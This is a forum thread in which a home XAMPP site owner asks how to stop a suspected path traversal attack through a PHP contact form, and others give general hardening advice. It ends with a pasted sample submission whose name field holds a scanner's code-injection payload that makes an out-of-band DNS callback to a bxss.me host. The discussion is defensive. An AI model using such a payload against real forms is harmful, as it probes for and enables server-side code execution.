Prevent LFI and Path Traversal

I'm hosting a small website on a xamppserver at home, yes I know, you shouldn't use xampp in production, but it's a simpe informatical website.
Be as it may yesterday someone managed by sending emails through the contactform to traverse the path and open files on my computer.
I noticed what he was doing before he could any harm. it's my first attack and the question rices how to IU prevent visitors from exploiting my path?

Well, analyse the attack. What about the emails caused files to be opened? What files got opened? Why does the code for the contact form have access to the file system at all? How did you detect the attack?

I detected the attack cause I got spammed with email. When checking the emails I noticed he was using the name and subjectline of the contactform to navigate my path.
I instictively shut my server down, more so cause I never came across it, I actually didn't know what was happening, I just knew something wasn't right.
A googlesearch later it seems like textbook pathtraversal. I started by validating the inputfileds of my form better, i think that would be the first and most important step?!
And that's about how far I got so far

I should express myself better. I guess he (or she) didn't traverse the path by sending emails, they used it to some how explore my files and then used the browser to navigate

Except from making sure my inputfields match the required regular expression, this is the main thing I do know I didn't before:
function test_input($data) {    $data = trim($data);    $data = stripslashes($data);    $data = htmlspecialchars($data);    return $data; }

By stripping all Backslashes and converting special charachters to htmlentitities, I should be able to prevent users from executing scripts on my server, I guess that should be enough?

I wouldn't consider XAMPP to be especially bad for a production environment. Some or all of the XAMPP components host, for example, the Wikipedia.

The PHP language is a little weak on security compared to JEE, but then most non-JEE language environments are. Perl, of course, is dangerous in anyone's hands.

So to avoid abuse, there are a couple of things you can do.

First of all, consider a firewall. I routinely blocked traffic from Korea and Russia because of so much bad-faith traffic I saw coming from there. Not long ago, I even went out and bought an actual firewall appliance on EBay to choke off a lot of stuff before it annoyed my server's own firewalls. The device is past vendor end-of-life, but I don't need its fancier features (where most of the security patches are needed) so it was a worthwhile purchase.

Secondly, keep the XAMPP system and the OS up to date. Security fixes come out all the time. And in the "X" part, while Windows is a LOT more secure than it used to be, Linux is a lot easier to keep updated, especially if you want to be in control of the updating.

And finally, most importantly, be paranoid when you design apps for the system. All the firewalls and security patches in the world won't help if you don't code secure apps.

Pieter Jansens wrote:By stripping all Backslashes and converting special charachters to htmlentitities, I should be able to prevent users from executing scripts on my server, I guess that should be enough?

No.

The problem is that you're doing something with the data that you're not supposed to. What parts of your code are handling the data from the e-mails? Where does it get stored? What do you do with it on the way to storage, and what do you do with the data when you retrieve it from storage?

The correct way to deal with the input data depends on what parts of your application the data flows through.

Can you also share with us an example of an e-mail sent to your application?

It's a pure html and css website, the only php I use is the mailscript and to display a message after the contactform is sent
I'm not doing anythin at all with the information besides mailling it to myself
He left a fingerprint though he used Acunetix Website Security Scanner to scan for vunerabilities and I have his account name

this is an example mail:
Name: "+"A".concat(70-3).concat(22*4).concat(103).concat(78).concat(105).concat(78)+(require"socket" Socket.gethostbyname("hitag"+"aywwlqjded174.bxss.me.")[3].to_s)+" Email: email Subject: msg_subject Message: message